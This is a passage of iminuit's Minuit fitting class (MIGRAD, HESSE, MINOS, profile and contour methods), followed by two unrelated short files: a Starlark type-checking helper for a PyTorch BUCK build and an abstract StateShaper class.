sum(self.fixed.values()) @property def covariance(self): """Covariance matrix (dict (name1, name2) -> covariance). .. seealso:: :meth:`matrix` """ free = tuple(self._free_parameters()) cov = self._last_state.covariance if self._last_state.has_covariance: return { (v1, v2): cov[i, j] for i, v1 in enumerate(free) for j, v2 in enumerate(free) } @property def gcc(self): """Global correlation coefficients (dict : name -> gcc).""" free = self._free_parameters() if self._last_state.has_globalcc: gcc = self._last_state.globalcc if gcc: return {v: gcc[i] for i, v in enumerate(free)} _print_level = 1 _fmin = None def __init__( self, fcn, grad=None, errordef=None, print_level=0, name=None, pedantic=True, throw_nan=False, use_array_call=False, **kwds, ): """ Construct minuit object from given *fcn* **Arguments:** **fcn**, the function to be optimized, is the only required argument. Two kinds of function signatures are understood. a) Parameters passed as positional arguments The function has several positional arguments, one for each fit parameter. Example:: def func(a, b, c): ... The parameters a, b, c must accept a real number. iminuit automagically detects parameters names in this case. More information about how the function signature is detected can be found in :ref:`function-sig-label` b) Parameters passed as Numpy array The function has a single argument which is a Numpy array. Example:: def func(x): ... Pass the keyword `use_array_call=True` to use this signature. For more information, see "Parameter Keyword Arguments" further down. If you work with array parameters a lot, have a look at the static initializer method :meth:`from_array_func`, which adds some convenience and safety to this use case. **Builtin Keyword Arguments:** - **throw_nan**: set fcn to raise RuntimeError when it encounters *nan*. (Default False) - **pedantic**: warns about parameters that do not have initial value or initial error/stepsize set. - **name**: sequence of strings. If set, this is used to detect parameter names instead of iminuit's function signature detection. - **print_level**: set the print_level for this Minuit. 0 is quiet. 1 print out at the end of MIGRAD/HESSE/MINOS. 2 prints debug messages. - **errordef**: Optional. See :attr:`errordef` for details on this parameter. If set to `None` (the default), Minuit will try to call `fcn.errordef` to set the error definition. If this fails, a warning is raised and use a value appropriate for a least-squares function is used. - **grad**: Optional. Provide a function that calculates the gradient analytically and returns an iterable object with one element for each dimension. If None is given MINUIT will calculate the gradient numerically. (Default None) - **use_array_call**: Optional. Set this to true if your function signature accepts a single numpy array of the parameters. You need to also pass the `name` keyword then to explicitly name the parameters. **Parameter Keyword Arguments:** iminuit allows user to set initial value, initial stepsize/error, limits of parameters and whether the parameter should be fixed by passing keyword arguments to Minuit. This is best explained through examples:: def f(x, y): return (x-2)**2 + (y-3)**2 * Initial value (varname):: #initial value for x and y m = Minuit(f, x=1, y=2) * Initial step size (fix_varname):: #initial step size for x and y m = Minuit(f, error_x=0.5, error_y=0.5) * Limits (limit_varname=tuple):: #limits x and y m = Minuit(f, limit_x=(-10,10), limit_y=(-20,20)) * Fixing parameters:: #fix x but vary y m = Minuit(f, fix_x=True) .. note:: You can use dictionary expansion to programmatically change parameters.:: kwargs = dict(x=1., error_x=0.5) m = Minuit(f, **kwargs) You can also obtain fit arguments from Minuit object for later reuse. *fitarg* will be automatically updated to the minimum value and the corresponding error when you ran migrad/hesse.:: m = Minuit(f, x=1, error_x=0.5) my_fitarg = m.fitarg another_fit = Minuit(f, **my_fitarg) """ if use_array_call and name is None: raise KeyError("`use_array_call=True` requires that `name` is set") args = mutil.describe(fcn) if name is None else name # Maintain 2 dictionaries to easily convert between # parameter names and position self._pos2var = tuple(args) self._var2pos = {k: i for i, k in enumerate(args)} if pedantic: self._pedantic(args, kwds) if errordef is None: if hasattr(fcn, "errordef"): errordef = fcn.errordef else: if pedantic: warn( "errordef not set, defaults to 1", mutil.InitialParamWarning, stacklevel=2, ) errordef = 1.0 errordef = float(errordef) if errordef <= 0: raise ValueError(f"errordef={errordef} must be a positive number") self.print_level = print_level self._strategy = MnStrategy(1) self._fcn = FCN(fcn, grad, use_array_call, errordef, throw_nan) self._init_state = self._make_init_state(kwds) self._last_state = self._init_state self._args = ArgsView(self) self._values = ValueView(self) self._errors = ErrorView(self) self._fixed = FixedView(self) self._merrors = mutil.MErrors() def _make_init_state(self, kwds): pars = self.parameters # check kwds fixed_param = {"fix_" + p for p in pars} limit_param = {"limit_" + p for p in pars} error_param = {"error_" + p for p in pars} for k in kwds: if ( k not in pars and k not in fixed_param and k not in limit_param and k not in error_param ): raise RuntimeError( f"Cannot understand keyword {k}, maybe a typo? " f"Parameters are {pars}" ) state = MnUserParameterState() for i, x in enumerate(self._pos2var): lim = mutil._normalize_limit(kwds.get(f"limit_{x}", None)) val = kwds.get(x, mutil._guess_initial_value(lim)) err = kwds.get(f"error_{x}", mutil._guess_initial_step(val)) fix = kwds.get(f"fix_{x}", False) if lim is None: state.add(x, val, err) else: lb, ub = lim if lb == ub: state.add(x, lb, err) state.fix(i) elif lb == -np.inf and ub == np.inf: state.add(x, val, err) elif ub == np.inf: state.add(x, val, err) state.set_lower_limit(i, lb) elif lb == -np.inf: state.add(x, val, err) state.set_upper_limit(i, ub) else: state.add(x, val, err, lb, ub) if fix: state.fix(i) return state @classmethod def from_array_func( cls, fcn, start, error=None, limit=None, fix=None, name=None, **kwds ): """Construct Minuit object from given *fcn* and start sequence. This is an alternative named constructor for the minuit object. It is more convenient to use for functions that accept a numpy array. **Arguments:** **fcn**: The function to be optimized. Must accept a single parameter that is a numpy array. def func(x): ... **start**: Sequence of numbers. Starting point for the minimization. **Keyword arguments:** **error**: Optional sequence of numbers. Initial step sizes. Scalars are automatically broadcasted to the length of the start sequence. **limit**: Optional sequence of limits that restrict the range in which a parameter is varied by minuit. Limits can be set in several ways. With inf = float("infinity") we get: - No limit: None, (-inf, inf), (None, None) - Lower limit: (x, None), (x, inf) [replace x with a number] - Upper limit: (None, x), (-inf, x) [replace x with a number] A single limit is automatically broadcasted to the length of the start sequence. **fix**: Optional sequence of boolean values. Whether to fix a parameter to the starting value. **name**: Optional sequence of parameter names. If names are not specified, the parameters are called x0, ..., xN. All other keywords are forwarded to :class:`Minuit`, see its documentation. **Example:** A simple example function is passed to Minuit. It accept a numpy array of the parameters. Initial starting values and error estimates are given:: import numpy as np def f(x): mu = (2, 3) return np.sum((x-mu)**2) # error is automatically broadcasted to (0.5, 0.5) m = Minuit.from_array_func(f, (2, 3), error=0.5) """ npar = len(start) pnames = name if name is not None else [f"x{i}" for i in range(npar)] kwds["name"] = pnames kwds["use_array_call"] = True if error is not None: if np.isscalar(error): error = np.ones(npar) * error else: if len(error) != npar: raise RuntimeError( "length of error sequence does " "not match start sequence" ) if limit is not None: if len(limit) == 2 and np.isscalar(limit[0]) and np.isscalar(limit[1]): limit = [limit for i in range(npar)] else: if len(limit) != npar: raise RuntimeError( "length of limit sequence does " "not match start sequence" ) for i, name in enumerate(pnames): kwds[name] = start[i] if error is not None: kwds["error_" + name] = error[i] if limit is not None: kwds["limit_" + name] = limit[i] if fix is not None: kwds["fix_" + name] = fix[i] return cls(fcn, **kwds) def reset(self): """Reset minimization state to initial state.""" self._last_state = self._init_state self._fmin = None self._fcn.nfcn = 0 self._fcn.ngrad = 0 self._merrors = mutil.MErrors() def migrad(self, ncall=None, resume=True, precision=None, iterate=5): """Run MIGRAD. MIGRAD is a robust minimisation algorithm which earned its reputation in 40+ years of almost exclusive usage in high-energy physics. How MIGRAD works is described in the `MINUIT paper`_. **Arguments:** * **ncall**: integer or None, optional; (approximate) maximum number of call before MIGRAD will stop trying. Default: None (indicates to use MIGRAD's internal heuristic). Note: MIGRAD may slightly violate this limit, because it checks the condition only after a full iteration of the algorithm, which usually performs several function calls. * **resume**: boolean indicating whether MIGRAD should resume from the previous minimiser attempt(True) or should start from the beginning(False). Default True. * **precision**: override Minuit precision estimate for the cost function. Default: None (= use epsilon of a C++ double). If the cost function has a lower precision (e.g. of a C++ float), setting this to a lower value will accelerate convergence and reduce the rate of unsuccessful convergence. * **iterate**: automatically call Migrad up to N times if convergence was not reached. Default: 5. This simple heuristic makes Migrad converge more often even if the numerical precision of the cost function is low. Setting this to 1 disables the feature. **Return:** :ref:`function-minimum-sruct`, list of :ref:`minuit-param-struct` """ if ncall is None: ncall = 0 # tells C++ Minuit to use its internal heuristic if iterate < 1: raise ValueError("iterate must be at least 1") if not resume: self.reset() migrad = MnMigrad(self._fcn, self._last_state, self.strategy) migrad.set_print_level(self.print_level) if precision is not None: migrad.precision = precision nc = self._fcn.nfcn ng = self._fcn.ngrad # Automatically call Migrad up to `iterate` times if minimum is not valid. # This simple heuristic makes Migrad converge more often. for _ in range(iterate): fm = migrad(ncall, self.tol) if fm.is_valid or fm.has_reached_call_limit: break self._last_state = fm.state self._fmin = mutil.FMin( fm, self._fcn, self._fcn.nfcn - nc, self._fcn.ngrad - ng, self.tol, ) mr = mutil.MigradResult(self._fmin, self.params) if self.print_level >= 2: print(mr) return mr def hesse(self, ncall=None): """Run HESSE to compute parabolic errors. HESSE estimates the covariance matrix by inverting the matrix of `second derivatives (Hesse matrix) at the minimum <http://en.wikipedia.org/wiki/Hessian_matrix>`_. This covariance matrix is valid if your :math:`\\chi^2` or likelihood profile looks like a hyperparabola around the the minimum. This is usually the case, especially when you fit many observations (in the limit of infinite samples this is always the case). If you want to know how your parameters are correlated, you also need to use HESSE. Also see :meth:`minos`, which computes the uncertainties in a different way. **Arguments:** - **ncall**: integer or None, limit the number of calls made by MINOS. Default: None (uses an internal heuristic by C++ MINUIT). **Returns:** list of :ref:`minuit-param-struct` """ ncall = 0 if ncall is None else int(ncall) nc = self._fcn.nfcn ng = self._fcn.ngrad hesse = MnHesse(self.strategy) fm = self._fmin._src if self._fmin else None if fm and fm.state == self._last_state: # _last_state not modified, can update _fmin which is more efficient hesse(self._fcn, fm, ncall) self._last_state = fm.state else: # _fmin does not exist or _last_state was modified, # so we cannot just update last _fmin self._last_state = hesse(self._fcn, self._last_state, ncall) if fm is not None: self._fmin.nfcn = self._fcn.nfcn - nc self._fmin.ngrad = self._fcn.ngrad - ng if self._last_state.has_covariance is False: if not self._fmin: raise RuntimeError("HESSE Failed") return self.params def minos(self, var=None, sigma=1.0, ncall=None): """Run MINOS to compute asymmetric confidence intervals. MINOS uses the profile likelihood method to compute (asymmetric) confidence intervals. It scans the negative log-likelihood or (equivalently) the least-squares cost function around the minimum to construct an asymmetric confidence interval. This interval may be more reasonable when a parameter is close to one of its parameter limits. As a rule-of-thumb: when the confidence intervals computed with HESSE and MINOS differ strongly, the MINOS intervals are to be preferred. Otherwise, HESSE intervals are preferred. Running MINOS is computationally expensive when there are many fit parameters. Effectively, it scans over *var* in small steps and runs MIGRAD to minimise the FCN with respect to all other free parameters at each point. This is requires many more FCN evaluations than running HESSE. **Arguments:** - **var**: optional variable name to compute the error for. If var is not given, MINOS is run for every variable. - **sigma**: number of :math:`\\sigma` error. Default 1.0. - **ncall**: integer or None, limit the number of calls made by MINOS. Default: None (uses an internal heuristic by C++ MINUIT). **Returns:** Dictionary of varname to :ref:`minos-error-struct`, containing all up to now computed errors, including the current request. """ if not self._fmin: raise RuntimeError( "MINOS require function to be at the minimum." " Run MIGRAD first." ) ncall = 0 if ncall is None else int(ncall) if not self._fmin.is_valid: raise RuntimeError( ("Function minimum is not valid. Make sure " "MIGRAD converged first") ) if var is not None and var not in self._pos2var: raise RuntimeError(f"Unknown parameter {var}") nc = self._fcn.nfcn ng = self._fcn.ngrad with mutil.TemporaryUp(self._fcn, sigma): minos = MnMinos(self._fcn, self._fmin._src, self.strategy) vnames = self._pos2var if var is None else [var] for vname in vnames: if self.fixed[vname]: if var is not None and var == vname: warn( f"Cannot scan parameter {var}, it is fixed", mutil.IMinuitWarning, ) return None continue me = minos(self._var2pos[vname], ncall, self.tol) self._merrors[vname] = mutil.MError(vname, me) self._fmin.nfcn = self._fcn.nfcn - nc self._fmin.ngrad = self._fcn.ngrad - ng return self.merrors def matrix(self, correlation=False, skip_fixed=True): """Error or correlation matrix in tuple or tuples format.""" if not self._last_state.has_covariance: raise RuntimeError( "Covariance is not valid. Maybe the last Hesse call failed?" ) mncov = self._last_state.covariance # When some parameters are fixed, mncov is a sub-matrix. If skip-fixed # is false, we need to expand the sub-matrix back into the full form. # This requires a translation between sub-index und full-index. if skip_fixed: npar = sum(not mp.is_fixed for mp in self._last_state) ind = range(npar) def cov(i, j): return mncov[i, j] else: ext2int = {} iint = 0 for mp in self._last_state: if not mp.is_fixed: ext2int[mp.number] = iint iint += 1 ind = range(self.narg) def cov(i, j): if i not in ext2int or j not in ext2int: return 0.0 return mncov[ext2int[i], ext2int[j]] names = [k for (k, v) in self.fixed.items() if not (skip_fixed and v)] if correlation: def cor(i, j): return cov(i, j) / ((cov(i, i) * cov(j, j)) ** 0.5 + 1e-100) ret = mutil.Matrix(names, ((cor(i, j) for i in ind) for j in ind)) else: ret = mutil.Matrix(names, ((cov(i, j) for i in ind) for j in ind)) return ret def latex_matrix(self): """Build :class:`LatexFactory` object with correlation matrix.""" matrix = self.matrix(correlation=True, skip_fixed=True) return LatexFactory.build_matrix(matrix.names, matrix) def np_matrix(self, **kwds): """Covariance or correlation matrix in numpy array format. Keyword arguments are forwarded to :meth:`matrix`. The name of this function was chosen to be analogous to :meth:`matrix`, it returns the same information in a different format. For documentation on the arguments, please see :meth:`matrix`. **Returns:** 2D ``numpy.ndarray`` of shape (N,N) (not a ``numpy.matrix``). """ matrix = self.matrix(**kwds) return np.array(matrix, dtype=np.double) def np_values(self): """Parameter values in numpy array format. Fixed parameters are included, the order follows :attr:`parameters`. **Returns:** ``numpy.ndarray`` of shape (N,). """ return np.array(self.args, dtype=np.double) def np_errors(self): """Hesse parameter errors in numpy array format. Fixed parameters are included, the order follows :attr:`parameters`. **Returns:** ``numpy.ndarray`` of shape (N,). """ a = np.empty(self.narg, dtype=np.double) for i in range(self.narg): a[i] = self.errors[i] return a def np_merrors(self): """MINOS parameter errors in numpy array format. Fixed parameters are included (zeros are returned), the order follows :attr:`parameters`. The format of the produced array follows matplotlib conventions, as in ``matplotlib.pyplot.errorbar``. The shape is (2, N) for N parameters. The first row represents the downward error as a positive offset from the center. Likewise, the second row represents the upward error as a positive offset from the center. **Returns:** ``numpy.ndarray`` of shape (2, N). """ # array format follows matplotlib conventions, see pyplot.errorbar a = np.zeros((2, self.narg)) for me in self.merrors.values(): i = self._var2pos[me.name] a[0, i] = -me.lower a[1, i] = me.upper return a def np_covariance(self): """Covariance matrix in numpy array format. Fixed parameters are included, the order follows :attr:`parameters`. **Returns:** ``numpy.ndarray`` of shape (N,N) (not a ``numpy.matrix``). """ return self.np_matrix(correlation=False, skip_fixed=False) def latex_param(self): """build :class:`iminuit.latex.LatexTable` for current parameter""" return LatexFactory.build_param_table(self.params, self.merrors) def latex_initial_param(self): """Build :class:`iminuit.latex.LatexTable` for initial parameter""" return LatexFactory.build_param_table(self.init_params, {}) @property def fmin(self): """Current function minimum data object""" return self._fmin @property def fval(self): """Function minimum value. .. seealso:: :meth:`fmin` """ fm = self._fmin return fm.fval if fm else None @property def params(self): """List of current parameter data objects.""" return mutil._get_params(self._last_state, self.merrors) @property def init_params(self): """List of current parameter data objects set to the initial fit state.""" return mutil._get_params(self._init_state, None) @property def ncalls_total(self): """Total number of calls to FCN (not just the last operation).""" return self._fcn.nfcn @property def ngrads_total(self): """Total number of calls to Gradient (not just the last operation).""" return self._fcn.ngrad @property def valid(self): """Check if function minimum is valid.""" return self._fmin and self._fmin.is_valid @property def accurate(self): """Check if covariance (of the last MIGRAD run) is accurate.""" return self._fmin and self._fmin.has_accurate_covar def mnprofile(self, vname, bins=30, bound=2, subtract_min=False): """Calculate MINOS profile around the specified range. Scans over **vname** and minimises FCN over the other parameters in each point. **Arguments:** * **vname** name of variable to scan * **bins** number of scanning bins. Default 30. * **bound** If bound is tuple, (left, right) scanning bound. If bound is a number, it specifies how many :math:`\\sigma` symmetrically from minimum (minimum+- bound* :math:`\\sigma`). Default 2 * **subtract_min** subtract_minimum off from return value. This makes it easy to label confidence interval. Default False. **Returns:** bins(center point), value, MIGRAD results """ if vname not in self._pos2var: raise ValueError("Unknown parameter %s" % vname) bound = self._normalize_bound(vname, bound) values = np.linspace(bound[0], bound[1], bins, dtype=np.double) results = np.empty(bins, dtype=np.double) status = np.empty(bins, dtype=np.bool) state = MnUserParameterState(self._last_state) # copy ipar = self._var2pos[vname] state.fix(ipar) pr = MnPrint("Minuit.mnprofile", self.print_level) for i, v in enumerate(values): state.set_value(ipar, v) migrad = MnMigrad(self._fcn, state, self.strategy) fm = migrad(0, self.tol) if not fm.is_valid: pr.warn(f"MIGRAD fails to converge for {vname}={v}") status[i] = fm.is_valid results[i] = fm.fval vmin = np.min(results) if subtract_min: results -= vmin return values, results, status def draw_mnprofile( self, vname, bins=30, bound=2, subtract_min=False, band=True, text=True ): """Draw MINOS profile in the specified range. It is obtained by finding MIGRAD results with **vname** fixed at various places within **bound**. **Arguments:** * **vname** variable name to scan * **bins** number of scanning bin. Default 30. * **bound** If bound is tuple, (left, right) scanning bound. If bound is a number, it specifies how many :math:`\\sigma` symmetrically from minimum (minimum+- bound* :math:`\\sigma`). Default 2. * **subtract_min** subtract_minimum off from return value. This makes it easy to label confidence interval. Default False. * **band** show green band to indicate the increase of fcn by *errordef*. Default True. * **text** show text for the location where the fcn is increased by *errordef*. This is less accurate than :meth:`minos`. Default True. **Returns:** bins(center point), value, migrad results .. plot:: plots/mnprofile.py :include-source: """ x, y, s = self.mnprofile(vname, bins, bound, subtract_min) return self._draw_profile(vname, x, y, band, text) def profile(self, vname, bins=100, bound=2, subtract_min=False): """Calculate cost function profile around specify range. **Arguments:** * **vname** variable name to scan * **bins** number of scanning bin. Default 100. * **bound** If bound is tuple, (left, right) scanning bound. If bound is a number, it specifies how many :math:`\\sigma` symmetrically from minimum (minimum+- bound* :math:`\\sigma`). Default: 2. * **subtract_min** subtract_minimum off from return value. This makes it easy to label confidence interval. Default False. **Returns:** bins(center point), value .. seealso:: :meth:`mnprofile` """ if subtract_min and not self._fmin: raise RuntimeError( "Request for minimization " "subtraction but no minimization has been done. " "Run MIGRAD first." ) bound = self._normalize_bound(vname, bound) ipar = self._var2pos[vname] scan = np.linspace(bound[0], bound[1], bins, dtype=np.double) result = np.empty(bins, dtype=np.double) values = self.np_values() for i, vi in enumerate(scan): values[ipar] = vi result[i] = self.fcn(values) if subtract_min: result -= self.fval return scan, result def draw_profile( self, vname, bins=100, bound=2, subtract_min=False, band=True, text=True, ): """A convenient wrapper for drawing profile using matplotlib. A 1D scan of the cost function around the minimum, useful to inspect the minimum and the FCN around the minimum for defects. For a fit with several free parameters this is not the same as the MINOS profile computed by :meth:`draw_mncontour`. Use :meth:`mnprofile` or :meth:`draw_mnprofile` to compute confidence intervals. If a function minimum was found in a previous MIGRAD call, a vertical line indicates the parameter value. An optional band indicates the uncertainty interval of the parameter computed by HESSE or MINOS. **Arguments:** In addition to argument listed on :meth:`profile`. draw_profile take these addition argument: * **band** show green band to indicate the increase of fcn by *errordef*. Note again that this is NOT minos error in general. Default True. * **text** show text for the location where the fcn is increased by *errordef*. This is less accurate than :meth:`minos` Note again that this is NOT minos error in general. Default True. .. seealso:: :meth:`mnprofile` :meth:`draw_mnprofile` :meth:`profile` """ x, y = self.profile(vname, bins, bound, subtract_min) return self._draw_profile(vname, x, y, band, text) def _draw_profile(self, vname, x, y, band, text): from matplotlib import pyplot as plt plt.plot(x, y) plt.xlabel(vname) plt.ylabel("FCN") v = self.values[vname] plt.axvline(v, color="k", linestyle="--") vmin = None vmax = None if (vname, 1) in self.merrors: vmin = v + self.merrors[(vname, -1)] vmax = v + self.merrors[(vname, 1)] if vname in self.errors: vmin = v - self.errors[vname] vmax = v + self.errors[vname] if vmin is not None and band: plt.axvspan(vmin, vmax, facecolor="0.8") if text: plt.title( ("%s = %.3g" % (vname, v)) if vmin is None else ("%s = %.3g - %.3g + %.3g" % (vname, v, v - vmin, vmax - v)), fontsize="large", ) return x, y def contour(self, x, y, bins=50, bound=2, subtract_min=False): """2D contour scan. Return the contour of a function scan over **x** and **y**, while keeping all other parameters fixed. The related :meth:`mncontour` works differently: for new pair of **x** and **y** in the scan, it minimises the function with the respect to the other parameters. This method is useful to inspect the function near the minimum to detect issues (the contours should look smooth). Use :meth:`mncontour` to create confidence regions for the parameters. If the fit has only two free parameters, you can use this instead of :meth:`mncontour`. **Arguments:** - **x** variable name for X axis of scan - **y** variable name for Y axis of scan - **bound** If bound is 2x2 array, [[v1min,v1max],[v2min,v2max]]. If bound is a number, it specifies how many :math:`\\sigma` symmetrically from minimum (minimum+- bound*:math:`\\sigma`). Default: 2. - **subtract_min** Subtract minimum off from return values. Default False. **Returns:** x_bins, y_bins, values values[y, x] <-- this choice is so that you can pass it to through matplotlib contour() .. seealso:: :meth:`mncontour` :meth:`mnprofile` """ if subtract_min and not self._fmin: raise RuntimeError( "Request for minimization " "subtraction but no minimization has been done. " "Run MIGRAD first." ) try: n = float(bound) in_sigma = True except TypeError: in_sigma = False if in_sigma: x_bound = self._normalize_bound(x, n) y_bound = self._normalize_bound(y, n) else: x_bound = self._normalize_bound(x, bound[0]) y_bound = self._normalize_bound(y, bound[1]) x_val = np.linspace(x_bound[0], x_bound[1], bins) y_val = np.linspace(y_bound[0], y_bound[1], bins) x_pos = self._var2pos[x] y_pos = self._var2pos[y] arg = list(self.args) result = np.empty((bins, bins), dtype=np.double) varg = np.array(arg, dtype=np.double) for i, x in enumerate(x_val): varg[x_pos] = x for j, y in enumerate(y_val): varg[y_pos] = y result[i, j] = self._fcn(varg) if subtract_min: result -= self._fmin.fval return x_val, y_val, result def mncontour(self, x, y, numpoints=100, sigma=1.0): """Two-dimensional MINOS contour scan. This scans over **x** and **y** and minimises all other free parameters in each scan point. This works as if **x** and **y** are fixed, while the other parameters are minimised by MIGRAD. This scan produces a statistical confidence region with the `profile likelihood method <https://en.wikipedia.org/wiki/Likelihood_function>`_. The contour line represents the values of **x** and **y** where the function passes the threshold that corresponds to `sigma` standard deviations (note that 1 standard deviations in two dimensions has a smaller coverage probability than 68 %). The calculation is expensive since it has to run MIGRAD at various points. **Arguments:** - **x** string variable name of the first parameter - **y** string variable name of the second parameter - **numpoints** number of points on the line to find. Default 20. - **sigma** number of sigma for the contour line. Default 1.0. **Returns:** x MINOS error struct, y MINOS error struct, contour line contour line is a list of the form [[x1,y1]...[xn,yn]] .. seealso:: :meth:`contour` :meth:`mnprofile` """ if not self._fmin: raise ValueError("Run MIGRAD first") ix = self._var2pos[x] iy = self._var2pos[y] vary = self._free_parameters() if x not in vary or y not in vary: raise ValueError("mncontour cannot be run on fixed parameters.") with mutil.TemporaryUp(self._fcn, sigma): mnc = MnContours(self._fcn, self._fmin._src, self.strategy) mex, mey, ce = mnc(ix, iy, numpoints) return mex, mey, ce def draw_mncontour(self, x, y, nsigma=2, numpoints=100): """Draw MINOS contour. **Arguments:** - **x**, **y** parameter name - **nsigma** number of sigma contours to draw - **numpoints** number of points to calculate for each contour **Returns:** contour .. seealso:: :meth:`mncontour` .. plot:: plots/mncontour.py :include-source: """ from matplotlib import pyplot as plt from matplotlib.contour import ContourSet c_val = [] c_pts = [] for sigma in range(1, nsigma + 1): pts = self.mncontour(x, y, numpoints, sigma)[2] # close curve pts.append(pts[0]) c_val.append(sigma) c_pts.append([pts]) # level can have more than one contour in mpl cs = ContourSet(plt.gca(), c_val, c_pts) plt.clabel(cs) plt.xlabel(x) plt.ylabel(y) return cs def draw_contour(self, x, y, bins=50, bound=2): """Convenience wrapper for drawing contours. The arguments are the same as :meth:`contour`. Please read the docs of :meth:`contour` and :meth:`mncontour` to understand the difference between the two. .. seealso:: :meth:`contour` :meth:`draw_mncontour` """ from matplotlib import pyplot as plt vx, vy, vz = self.contour(x, y, bins, bound, subtract_min=True) v = [self.errordef * (i + 1) for i in range(4)] CS = plt.contour(vx, vy, vz, v) plt.clabel(CS, v) plt.xlabel(x) plt.ylabel(y) plt.axhline(self.values[y], color="k", ls="--") plt.axvline(self.values[x], color="k", ls="--") return vx, vy, vz def _free_parameters(self): return (mp.name for mp in self._last_state if not mp.is_fixed) def _normalize_bound(self, vname, bound): try: n = float(bound) in_sigma = True except TypeError: in_sigma = False pass if in_sigma: if not self.accurate: warn( "Specified nsigma bound, but error matrix is not accurate", mutil.IMinuitWarning, ) start = self.values[vname] sigma = self.errors[vname] bound = (start - n * sigma, start + n * sigma) return bound def _copy_state_if_needed(self): if self._last_state == self._init_state or ( self._fmin and self._last_state == self._fmin._src.state ): self._last_state = MnUserParameterState(self._last_state) def _pedantic(self, parameters, kwds): for vn in parameters: if vn not in kwds and "limit_%s" % vn not in kwds: warn( f"Parameter {vn} has neither initial value nor limits", mutil.InitialParamWarning, stacklevel=3, ) # Helper classes class BasicView: """Dict-like view of parameter state. Derived classes need to implement methods _set and _get to access specific properties of the parameter state.""" _minuit = None def __init__(self, minuit): self._minuit = minuit def __iter__(self): return self._minuit._pos2var.__iter__() def __len__(self): return len(self._minuit._pos2var) def keys(self): return self._minuit._pos2var def items(self): return [(name, self._get(k)) for (k, name) in enumerate(self)] def values(self): return [self._get(k) for k in range(len(self))] def __getitem__(self, key): if isinstance(key, slice): ind = range(*key.indices(len(self))) return [self._get(i) for i in ind] i = key if mutil._is_int(key) else self._minuit._var2pos[key] if i < 0: i += len(self) if i < 0 or i >= len(self): raise IndexError return self._get(i) def __setitem__(self, key, value): self._minuit._copy_state_if_needed() if isinstance(key, slice): ind = range(*key.indices(len(self))) if hasattr(value, "__getitem__") and hasattr(value, "__len__"): if len(value) != len(ind): raise ValueError("length of argument does not match slice") for i, v in zip(ind, value): self._set(i, v) else: # basic broadcasting for i in ind: self._set(i, value) return i = key if mutil._is_int(key) else self._minuit._var2pos[key] if i < 0: i += len(self) if i < 0 or i >= len(self): raise IndexError self._set(i, value) def __repr__(self): s = "<%s of Minuit at %x>" % (self.__class__.__name__, id(self._minuit)) for (k, v) in self.items(): s += "\n {0}: {1}".format(k, v) return s class ArgsView: """List-like view of parameter values.""" _minuit = None def __init__(self, minuit): self._minuit = minuit def __len__(self): return len(self._minuit._pos2var) def __getitem__(self, key): if isinstance(key, slice): ind = range(*key.indices(len(self))) return [self._minuit._last_state[i].value for i in ind] i = key if i < 0: i += len(self) if i < 0 or i >= len(self): raise IndexError return self._minuit._last_state[i].value def __setitem__(self, key, value): self._minuit._copy_state_if_needed() if isinstance(key, slice): ind = range(*key.indices(len(self))) for i, v in zip(ind, value): self._minuit._last_state.set_value(i, v) else: i = key if i < 0: i += len(self) if i < 0 or i >= len(self): raise IndexError self._minuit._last_state.set_value(i, value) def __repr__(self): s = "<ArgsView of Minuit at %x>" % id(self._minuit) for v in self: s += "\n {0}".format(v) return s class ValueView(BasicView): """Dict-like view of parameter values.""" def _get(self, i): return self._minuit._last_state[i].value def _set(self, i, value): self._minuit._last_state.set_value(i, value) class ErrorView(BasicView): """Dict-like view of parameter errors.""" def _get(self, i): return self._minuit._last_state[i].error def _set(self, i, value): self._minuit._last_state.set_error(i, value) class FixedView(BasicView): """Dict-like view of whether parameters are fixed.""" def _get(self, i): return self._minuit._last_state[i].is_fixed def _set(self, i, fix): if fix: self._minuit._last_state.fix(i) else: self._minuit._last_state.release(i)
# Only used for PyTorch open source BUCK build """Provides macros for queries type information.""" _SELECT_TYPE = type(select({"DEFAULT": []})) def is_select(thing): return type(thing) == _SELECT_TYPE def is_unicode(arg): """Checks if provided instance has a unicode type. Args: arg: An instance to check. type: Any Returns: True for unicode instances, False otherwise. rtype: bool """ return hasattr(arg, "encode") _STRING_TYPE = type("") def is_string(arg): """Checks if provided instance has a string type. Args: arg: An instance to check. type: Any Returns: True for string instances, False otherwise. rtype: bool """ return type(arg) == _STRING_TYPE _LIST_TYPE = type([]) def is_list(arg): """Checks if provided instance has a list type. Args: arg: An instance to check. type: Any Returns: True for list instances, False otherwise. rtype: bool """ return type(arg) == _LIST_TYPE _DICT_TYPE = type({}) def is_dict(arg): """Checks if provided instance has a dict type. Args: arg: An instance to check. type: Any Returns: True for dict instances, False otherwise. rtype: bool """ return type(arg) == _DICT_TYPE _TUPLE_TYPE = type(()) def is_tuple(arg): """Checks if provided instance has a tuple type. Args: arg: An instance to check. type: Any Returns: True for tuple instances, False otherwise. rtype: bool """ return type(arg) == _TUPLE_TYPE def is_collection(arg): """Checks if provided instance is a collection subtype. This will either be a dict, list, or tuple. """ return is_dict(arg) or is_list(arg) or is_tuple(arg) _BOOL_TYPE = type(True) def is_bool(arg): """Checks if provided instance is a boolean value. Args: arg: An instance ot check. type: Any Returns: True for boolean values, False otherwise. rtype: bool """ return type(arg) == _BOOL_TYPE _NUMBER_TYPE = type(1) def is_number(arg): """Checks if provided instance is a number value. Args: arg: An instance ot check. type: Any Returns: True for number values, False otherwise. rtype: bool """ return type(arg) == _NUMBER_TYPE _STRUCT_TYPE = type(struct()) # Starlark returns the same type for all structs def is_struct(arg): """Checks if provided instance is a struct value. Args: arg: An instance ot check. type: Any Returns: True for struct values, False otherwise. rtype: bool """ return type(arg) == _STRUCT_TYPE type_utils = struct( is_bool = is_bool, is_number = is_number, is_string = is_string, is_unicode = is_unicode, is_list = is_list, is_dict = is_dict, is_tuple = is_tuple, is_collection = is_collection, is_select = is_select, is_struct = is_struct, )
# Copyright (c) Microsoft Corporation. # Licensed under the MIT license. from abc import abstractmethod from .abs_shaper import AbsShaper class StateShaper(AbsShaper): """State shaper class. A state shaper is used to convert a decision event and snapshot list to model input. """ @abstractmethod def __call__(self, decision_event, snapshot_list): pass def reset(self): """Reset stateful members, if any, to their states at the beginning of an episode.""" pass
